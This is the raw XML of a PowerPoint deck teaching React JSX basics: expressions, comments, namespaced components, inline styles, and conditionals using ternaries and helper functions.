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82" r:id="rId2"/>
    <p:sldId id="566" r:id="rId3"/>
    <p:sldId id="551" r:id="rId4"/>
    <p:sldId id="606" r:id="rId5"/>
    <p:sldId id="607" r:id="rId6"/>
    <p:sldId id="608" r:id="rId7"/>
    <p:sldId id="580" r:id="rId8"/>
    <p:sldId id="589" r:id="rId9"/>
    <p:sldId id="609" r:id="rId10"/>
    <p:sldId id="610" r:id="rId11"/>
    <p:sldId id="611" r:id="rId12"/>
    <p:sldId id="612" r:id="rId13"/>
    <p:sldId id="614" r:id="rId14"/>
    <p:sldId id="615" r:id="rId15"/>
    <p:sldId id="618" r:id="rId16"/>
    <p:sldId id="619" r:id="rId17"/>
    <p:sldId id="616" r:id="rId18"/>
    <p:sldId id="598" r:id="rId19"/>
    <p:sldId id="571" r:id="rId20"/>
    <p:sldId id="617" r:id="rId21"/>
    <p:sldId id="613" r:id="rId22"/>
    <p:sldId id="599" r:id="rId23"/>
    <p:sldId id="600" r:id="rId24"/>
    <p:sldId id="601" r:id="rId25"/>
    <p:sldId id="602" r:id="rId26"/>
    <p:sldId id="603" r:id="rId27"/>
    <p:sldId id="597" r:id="rId28"/>
    <p:sldId id="593" r:id="rId29"/>
    <p:sldId id="577" r:id="rId30"/>
    <p:sldId id="594" r:id="rId31"/>
    <p:sldId id="595" r:id="rId32"/>
    <p:sldId id="572" r:id="rId33"/>
    <p:sldId id="596" r:id="rId34"/>
    <p:sldId id="592" r:id="rId35"/>
    <p:sldId id="575" r:id="rId36"/>
    <p:sldId id="5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1" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="72" d="100"/>
          <a:sy n="7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t>19-05-2016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component-specs.html#displaynam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html-js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 bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2484189"/>
            <a:ext cx="9036050" cy="1651248"/>
          </a:xfrm>
          <a:prstGeom prst="horizontalScroll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7112" y="1524000"/>
            <a:ext cx="5411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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JSX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</a:rPr>
              <a:t> Expressions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762000"/>
            <a:ext cx="861059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render: function() {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headings = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>this.props.headings.map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(function(name) {</a:t>
            </a:r>
          </a:p>
          <a:p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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(&lt;Heading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>heading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{name}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/&gt;);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;{headings}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&gt;;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/>
              <a:t>"We are rendering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{headings}, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>which is a list of React components, directly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>by adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>them in curly braces as children of the &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&gt; tag.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expressions that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>are used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to specify the child components are called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>child expressions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>.”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="28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258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</a:rPr>
              <a:t> Expressions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762000"/>
            <a:ext cx="861059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// Passing props as expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ReactDOM.render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(&lt;App </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	headings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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{['When', 'Who', 'Description']}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	data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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{data} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/&gt;,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>('container</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>'));</a:t>
            </a:r>
          </a:p>
          <a:p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// Evaluating expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ReactDOM.render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>App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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>headings = {['When', 'Who', 'Description']}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	data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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &gt; 0 ? data : ''} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>/&gt;,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>('container'));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002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Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Expressions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10" y="673575"/>
            <a:ext cx="861059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Comments </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>are simply just JavaScript expressions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>When we are in a child element, just wrap the comments in the curly braces."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return(&lt;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</a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{/* This is a comment */}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.heading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt;);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ReactDOM.render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(&lt;App</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/* Multi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Comment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>headings = {headings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>}…..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858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Namespaced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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10" y="673575"/>
            <a:ext cx="904009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RecentChangesTable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= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return &lt;table&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>		{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.children</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	     &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>table&gt;;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Now, we can replace the App component to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RecentChangesTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> instead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of   &lt;table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;."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App = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return(&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>RecentChangesTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;Headings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>headings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.headings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>} /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;Rows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>changeSets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.changeSets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>} /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>       &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>RecentChangesTable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>&gt;);}   });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337137"/>
            <a:ext cx="640079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React allows creating components that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>namespaced</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> under a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>parent component </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>so that they don't interfere with other components or global functions."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90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Styling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10" y="673575"/>
            <a:ext cx="904009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"We can represent this as a JavaScript object in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CamelCase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> fashion."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var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headingStyle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=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>backgroundColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FloralWhite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fontSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: '19px'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>};</a:t>
            </a:r>
          </a:p>
          <a:p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use it in each Heading component as a JavaScript object."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>RecentChangesTable.Heading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>({</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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headingStyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>backgroundColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>FloralWhite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>fontSize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: '19px' };</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return(&lt;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style={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>headingStyle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt;{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.heading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>}&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&gt;);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>   }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2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10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Conditionals in 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10" y="673575"/>
            <a:ext cx="90400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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>React embraces the idea of tying markup and logic that generates the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>markup  together</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. This means that we can use the power of JavaScript for loops </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>and  conditionals.“</a:t>
            </a:r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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using if/else directly doesn't </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>work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/>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>={if(success) { 'green' } else { 'red' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>}}/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Error: Parse Error: Line 1: Unexpected token if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>"Instead, we can use a ternary operator for specifying the if/else logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>.“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59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Conditionals in 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10" y="673575"/>
            <a:ext cx="904009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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using ternary operator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>={ success ? 'green' : 'red' }/&gt;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React.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>("div", {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: success ? 'green' : 'red'})</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>But ternary operator gets cumbersome with large expressions when we want to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>use  the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>React component as a child.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// Moving if/else logic to a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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showResult</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>if(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>this.props.success</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> === true)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>	return </a:t>
            </a:r>
